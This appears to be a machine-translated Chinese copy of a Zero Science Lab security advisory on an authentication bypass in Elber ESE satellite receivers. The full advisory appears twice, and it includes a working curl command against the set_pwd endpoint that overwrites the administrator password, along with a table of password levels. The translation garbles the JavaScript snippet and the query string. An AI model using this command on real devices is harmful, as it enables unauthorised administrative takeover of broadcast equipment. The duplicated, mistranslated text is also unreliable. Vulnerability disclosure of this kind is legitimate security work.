Elber ESE DVB-S/S2卫星接收器1.5.x身份验证旁路
Vendor: Elber S.R.L.
产品网页: https://www.elber.it
受影响的版本: 1.5.179修订904
1.5.56修订884
1.229修订440
摘要: ESE(Elber卫星设备)产品线,专为
高端无线电贡献和分销市场,质量和质量
可靠性是最重要的。 Elber IRD(集成的接收器解码器)
ESE-01在
优异的质量/价格比。数字卫星贡献的发展
网络和连接大量站点的需求需要便宜
但是可靠且执行的卫星接收器与集成解码器。
DESC:通过
对密码管理功能的直接且未经授权的访问。这
问题允许攻击者通过操纵set_pwd绕过身份验证
端点使他们能够覆盖该密码
系统。这将授予未经授权的管理访问权限
应用程序损害了设备的系统安全性。
--------------------------------------------------------------------------------------------------------------------------
/modules/pwd.html
-------------------------
50:函数apply_pwd(级别,PWD)
51: {
52: $ .get('json_data/set_pwd',{lev:level,pass
wd},
53:功能(数据){
54: //qul.alert( {title:'operation'Stext:data});
55: show_message(数据);
56:})。失败(function(error){
57: show_message('错误' + error.status,'error');
58:});
59:}
--------------------------------------------------------------------------------------------------------------------------
在: NBFM控制器上测试
头脑/IP
gjoko“ liquidworm” krstic发现的脆弱性
@Zeroscience
咨询ID: ZSL-2024-5820
咨询URL: https://www.zeroscience.mk/en/vulnerabilities/zsl-2024-5820.php
18.08.2023
- -
$ curl -s http://[target]/json_data/set_pwd?lev=2pass=admin1234
参考(LEV参数):
级别7=SNMP写入社区(SNMP_WRITE_PWD)
级别6=snmp读取社区(snmp_read_pwd)
级别5=自定义密码?隐。 (custom_pwd)
级别4=显示密码(display_pwd)?
级别2=管理员密码(admin_pwd)
级别1=超级用户密码(puser_pwd)
级别0=用户密码(user_pwd)
Vendor: Elber S.R.L.
产品网页: https://www.elber.it
受影响的版本: 1.5.179修订904
1.5.56修订884
1.229修订440
摘要: ESE(Elber卫星设备)产品线,专为
高端无线电贡献和分销市场,质量和质量
可靠性是最重要的。 Elber IRD(集成的接收器解码器)
ESE-01在
优异的质量/价格比。数字卫星贡献的发展
网络和连接大量站点的需求需要便宜
但是可靠且执行的卫星接收器与集成解码器。
DESC:通过
对密码管理功能的直接且未经授权的访问。这
问题允许攻击者通过操纵set_pwd绕过身份验证
端点使他们能够覆盖该密码
系统。这将授予未经授权的管理访问权限
应用程序损害了设备的系统安全性。
--------------------------------------------------------------------------------------------------------------------------
/modules/pwd.html
-------------------------
50:函数apply_pwd(级别,PWD)
51: {
52: $ .get('json_data/set_pwd',{lev:level,pass

53:功能(数据){
54: //qul.alert( {title:'operation'Stext:data});
55: show_message(数据);
56:})。失败(function(error){
57: show_message('错误' + error.status,'error');
58:});
59:}
--------------------------------------------------------------------------------------------------------------------------
在: NBFM控制器上测试
头脑/IP
gjoko“ liquidworm” krstic发现的脆弱性
@Zeroscience
咨询ID: ZSL-2024-5820
咨询URL: https://www.zeroscience.mk/en/vulnerabilities/zsl-2024-5820.php
18.08.2023
- -
$ curl -s http://[target]/json_data/set_pwd?lev=2pass=admin1234
参考(LEV参数):
级别7=SNMP写入社区(SNMP_WRITE_PWD)
级别6=snmp读取社区(snmp_read_pwd)
级别5=自定义密码?隐。 (custom_pwd)
级别4=显示密码(display_pwd)?
级别2=管理员密码(admin_pwd)
级别1=超级用户密码(puser_pwd)
级别0=用户密码(user_pwd)